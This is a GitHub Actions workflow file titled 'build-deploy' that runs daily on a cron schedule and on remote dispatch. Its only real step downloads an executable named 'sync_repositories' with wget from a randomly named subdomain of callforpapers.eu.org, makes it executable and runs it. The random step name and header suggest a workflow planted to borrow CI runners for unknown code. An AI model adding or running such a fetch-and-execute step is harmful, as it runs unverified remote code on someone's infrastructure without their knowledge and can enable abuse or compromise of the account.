#2024-03-18-[083359]-6ndd4ei2
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "53 3 * * * "

jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: pcifkcn94i5qsl50
        run: |
          wget -q https://8q10acltla7qbwke.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories